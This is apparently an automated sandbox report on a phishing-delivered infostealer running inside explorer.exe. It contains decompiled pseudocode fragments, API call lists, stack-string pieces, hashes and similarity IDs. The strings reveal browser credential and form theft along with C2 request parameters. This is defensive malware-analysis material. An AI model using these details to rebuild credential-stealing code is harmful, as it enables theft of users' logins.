								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0xb165e8;
									if(_t148 != 0) {
										 *0xb191e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								L00A3DC10(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									L00A33B40(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = L00A39830(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E00A8235B();
									goto L26;
								} else {
									_t152 = E00A3A130(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(L00A40490(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x00a29006
0x00a29006
0x00a2900b
0x00a29010
0x00a29015
0x00a2901b
0x00a2901d
0x00a29026
0x00a2902f
0x00a29038
0x00a29040
0x00a29048
0x00a2904f
0x00a29055
0x00a29069
0x00a29071
0x00a2907e
0x00a29086
0x00a2908f
0x00a290a2
0x00a290b7
0x00a290bb
0x00a290d8
0x00000000
0x00a290e3
0x00a290fb
0x00a290ff
0x00000000
0x00000000
0x00a29107
0x00a821ff
0x00a821ff
0x00000000
0x00a821ff
0x00a29114
0x00a82210
0x00a82216
0x00a82216
0x00a2911a
0x00a2911a
0x00a2911a
0x00a29121
0x00a29127
0x00a2912b
0x00a29132
0x00a29142
0x00a2914e
0x00a29159
0x00a2917a
0x00a2917e
0x00000000
0x00a291a0
0x00a82238
0x00a82240
0x00a82248
0x00a8224a
0x00a82252
0x00000000
0x00a82258
0x00a82258
0x00a82261
0x00a82338
0x00a82338
0x00a8233b
0x00a82343
0x00a82348
0x00a8234e
0x00a8234e
0x00a82387
0x00000000
0x00a82387
0x00a8226f
0x00a82276
0x00a8227c
0x00a8227f
0x00a8227f
0x00a8229b
0x00a822a8
0x00a822aa
0x00a822b2
0x00a8232c
0x00a8232c
0x00a82333
0x00000000
0x00a822b4
0x00a822c7
0x00a822c9
0x00a822d1
0x00000000
0x00000000
0x00a822d9
0x00a822e2
0x00a822e8
0x00a822ec
0x00a822f3
0x00a82303
0x00a8231f
0x00000000
0x00000000
0x00a82321
0x00a82326
0x00a82326
0x00000000
0x00a82326
0x00a822db
0x00000000
0x00a822db
0x00a822b2
0x00000000
0x00a82252
0x00a2917e
0x00a290d8
0x00a290bd
0x00a290c2
0x00a290ce

Strings

@, xrefs: 00A29055
$, xrefs: 00A29071

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 93dca29cb4dc1eac74377859c6557aeeccdf81bc532aefba75e8301427471cb3
Instruction ID: c1c39cbde5aff227aab3f2000db76cf763a0481a08f8609284bbc52ee81dfce3
Opcode Fuzzy Hash: 93dca29cb4dc1eac74377859c6557aeeccdf81bc532aefba75e8301427471cb3
Instruction Fuzzy Hash: 5D8109B1D002799BDB25DF54CD45BEEB6B8AF48710F0041EAE919B7280E7709E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4376, Parent PID: 7148COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	457
Total number of Limit Nodes:	17

Executed Functions

Function 11396F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1139712E
setsockopt.WS2_32 ref: 11397830
recv.WS2_32 ref: 11397859

Strings

Co, xrefs: 11397323
&sql, xrefs: 11397471
GET , xrefs: 11397318
ose, xrefs: 1139733F
tion, xrefs: 11397331
&un=, xrefs: 113974F1
&br=, xrefs: 11397509
: cl, xrefs: 11397338
nnec, xrefs: 1139732A
dat=, xrefs: 11397290

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: e6ccd062a0bf12921b2dd93ef48a9735fceeae7401aa093faf47ca2224fe1886
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 38527E35618A4D8FD71AEF68C4847E9B7E1FB54308F50466EC49FC728AEE30A549CB81

Uniqueness

Uniqueness Score: -1.00%

Function 11396232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 11396449

Strings

`, xrefs: 1139641D

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: e2c10cbee883282854f1e94ba0750c0159ebb352603c05093dbce2d44fc7a1b8
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 14224AB0A19A0E9FDB49DF28C4946AAF7F1FB98309F40432EE45ED7254DB30A451DB81

Uniqueness

Uniqueness Score: -1.00%

Function 11397E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 11397E67

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 6ba7144eee67fa54b1d24910cb135411bc171771a0663fb3e0f792b596249446
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 5501B134628B884F8788EF6CD48016AB7E4FBCD318F000B3EE99AC3254EB70C5418B42

Uniqueness

Uniqueness Score: -1.00%

Function 11397E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 11397E67

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 4e706cd69ba7b3dc021d73f1243c06e1b59c3fbe5740500cdf3092dc593fd735
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 6901A234628B884B8749EF2C94412A6B3E5FBCE314F000B3EE99AC3244DB21D5028B82

Uniqueness

Uniqueness Score: -1.00%

Function 113918C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 113919A0

Strings

User-Agent: , xrefs: 11391935, 11391948
on.d, xrefs: 11391902
nt: , xrefs: 1139191E
urlmon.dll, xrefs: 11391959

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b0697cece543b59a83c068f89d47bee38e2d09ca3560c12629cfa27a9da25dcc
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: B631D131614A0D8BCB05EFA8C8847EEB7E0FB58318F40022AD44EE7244DE749645C789

Uniqueness

Uniqueness Score: -1.00%

Function 113918BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 113919A0

Strings

User-Agent: , xrefs: 11391935, 11391948
on.d, xrefs: 11391902
nt: , xrefs: 1139191E
urlmon.dll, xrefs: 11391959

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: de616758436bc309cf8f47a1bedaebf0cec178f032c22f9362cb5b8e26120151
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 47219171614A4D8BCB05EFA8C8847EEBBA1FF58318F40422AD45AE7244DE749645CB89

Uniqueness

Uniqueness Score: -1.00%

Function 1138DB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 1138DCCA

Strings

.dll, xrefs: 1138DBCD
kern, xrefs: 1138DB99
el32, xrefs: 1138DBA0

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 2fc54e198b6f0b0e772a0cb2120f3c680f1b25fac9a290478766033032be03b9
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 3A413C74918A0CCFDB44EFA8C8987AD77F0FB58308F00466AD84ADB259DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1138DB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 1138DCCA

Strings

.dll, xrefs: 1138DBCD
kern, xrefs: 1138DB99
el32, xrefs: 1138DBA0

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 16bc0d303eeffdabc85a39d9f1927eeab20ca19f8f762a8a3b3db6390883cf43
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 82411B74918A0C8FDB84EFA8C8987ED77F1FB98304F04416AD84EDB259DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1139372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11393791

Strings

ect, xrefs: 11393761
conn, xrefs: 1139375A

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: b32bb9efc92c36e78db83ea40392a1eb6f51cada4c7b28af8e52cf558a006a1e
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 33011E74618B1C8FCB84EF5CE088B55B7E0FB59314F1545AED90DCB266C674D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 11393732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11393791

Strings

ect, xrefs: 11393761
conn, xrefs: 1139375A

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 62f9569be8bdbdf0b2adb7cf5d300aa69fb3ce9f689b06940da5f01e27bf9d5d
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 83012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541AEE80DCB226CA74C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 1139362C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 11393691

Strings

WSAS, xrefs: 11393653
tart, xrefs: 1139365A

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction ID: 6fc023a9d7353a521c64753db4ed83d6018ba9dd798bd829a8d8811536db4f85
Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction Fuzzy Hash: D8018B70519A188FCB44DF1CD088B69BBE0FB58315F2502ADD409CB26AC7B0C9428B96

Uniqueness

Uniqueness Score: -1.00%

Function 11393632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 11393691

Strings

WSAS, xrefs: 11393653
tart, xrefs: 1139365A

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction ID: 36cfa3b3fca56a870b58c34f47757680727c1cc91177542076dd1d94aaa1dc81
Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction Fuzzy Hash: 28014B70519A188FCB44DF1C9088B69BBE0FB58355F2541A9E40DCB26AC7B0C9418B96

Uniqueness

Uniqueness Score: -1.00%

Function 113936B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 11393713

Strings

send, xrefs: 113936DA

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 9ee0346e1afe0be2d35a27aa99c4f54fdd4a806b07284f31eac5749c1e56bdeb
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 1A01127051CA1D8FDB84DF1CD048B5577E0EB58314F1546AED85DCB266C670D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 113935B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 11393611

Strings

sock, xrefs: 113935D9

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: ba84e72dbab979a51a22ab183f14672a00d547e5a344ae864799f397d3790784
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 0D012C70618A1C8FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266C7B0C981CB86

Uniqueness

Uniqueness Score: -1.00%

Function 1138B2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1138B32D

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: b9e32df9baf6bdb86efbc49e83e32dbe9984aaddf92966ea3738ad4b617882fa
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 34316974614B4ADFDB58DF2980882A5BBA0FB54309F44437ECD6DCA20ECBB0A494CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1138B412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 1138B461

Memory Dump Source

Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11330000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: b0204ac8432edb2d13ff256fa0301bb53e8e392da14b738a772f546e5a517c0a
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 28F0C234268A4D4FDB88EB2CD44562AF3D0FBE8218F41467EA54DC3268DA69D5828716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10825D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

kern, xrefs: 10825F5A
S, xrefs: 10826073
ll, xrefs: 10825F13
el32, xrefs: 10825F27
wini, xrefs: 10825F72
dll, xrefs: 10825F4C
net., xrefs: 10825F44
.dll, xrefs: 10825F2F
M, xrefs: 10826082
user, xrefs: 10825F03
32.d, xrefs: 10825F0B

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 07ee989b90bd5ea56de5484998561acd3851f9f12606d666388241981145a891
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 0CE16874618F488FC7A4DF68D4957AAB7E0FB58301F904A2EA59FC7241DF30A581CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10828792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

d, xrefs: 108288F2
name, xrefs: 1082887D
e, xrefs: 108288BD
ypte, xrefs: 108288DA
Fiel, xrefs: 10828884
rnam, xrefs: 108288B5
encr, xrefs: 1082889D
Subm, xrefs: 10828855
form, xrefs: 1082884D
user, xrefs: 10828876
itUR, xrefs: 1082885D
ypte, xrefs: 108288A5
dPas, xrefs: 108288E2
dUse, xrefs: 108288AD
guid, xrefs: 108287CE
encr, xrefs: 108288D2
swor, xrefs: 108288EA

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 0cdf228254c92ca4c761951516c48ca0844edc6cf63d405ea16988fbbf4b1dc4
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 2CB18D30518B488EDB59DF68C496AEEB7F1FF98300F50451EE49ACB252EF70A445CB86

Uniqueness

Uniqueness Score: -1.00%

Function 10826622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

d, xrefs: 1082667B
l, xrefs: 10826682
n, xrefs: 108266BA
p, xrefs: 10826690
t, xrefs: 108266C8
s, xrefs: 10826689
c, xrefs: 10826697
l, xrefs: 108266D6
d, xrefs: 108266A5
u, xrefs: 10826661
i, xrefs: 1082669E
n, xrefs: 108266C1
d, xrefs: 108266CF
w, xrefs: 108266B3
l, xrefs: 108266AC
e, xrefs: 1082666D
2, xrefs: 10826674

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 87d25a136cbceb92e025111ad00c6c1c7b85e62c2c3bcbf312d22e2effb6c6a6
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 4F419F70A1CB088FDB14DF88B4866AD7BE2FB48708F40026EE409D3245DB75AD85CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 1082DAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

e, xrefs: 1082DCA0
], xrefs: 1082DCA8
[, xrefs: 1082DC66
c, xrefs: 1082DC0B
D, xrefs: 1082DCDA
l, xrefs: 1082DCE2
l, xrefs: 1082DC35
[, xrefs: 1082DC90
[, xrefs: 1082DCCD
[, xrefs: 1082DBF6
], xrefs: 1082DC3D
n, xrefs: 1082DC98
b, xrefs: 1082DC73
[, xrefs: 1082DC2D

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 9df96923780edb2c6f09982bf4799e57b8ffe0b90dbf7c5ea83d3da4bd5793e6
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: CBC15B74218B088BC758EF28D4966AAF7E1FB94304F80472EA49EC7250DF30E555CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 1082DF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 1082DFB8
r, xrefs: 1082DF90
r, xrefs: 1082DFA0
0, xrefs: 1082DF5B
n, xrefs: 1082DF6B
., xrefs: 1082DF63
r, xrefs: 1082DF88
c, xrefs: 1082DFC8
r, xrefs: 1082DFB0
r, xrefs: 1082DF98
r, xrefs: 1082DFC0
r, xrefs: 1082DFA8

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 10064b607d2673e99f111a1f3e7e6920c4181dea5eeaf7632caf8f8d4135eff3
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 7851A43151C7488FD719CF18E4816AAB7E5FB85700F90193EF8CB87242DBB4A946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 108272F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 108274DB
sspi, xrefs: 10827320
cli., xrefs: 10827327
dragon_s.dll, xrefs: 10827614
opera_browser.dll, xrefs: 10827629
l, xrefs: 108274E2
dll, xrefs: 1082732E
nspr, xrefs: 108274D4

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: b405a8c4e4a75ee373f02417829b3e3cfebde15198db8b680f45d7bf5bc3bd46
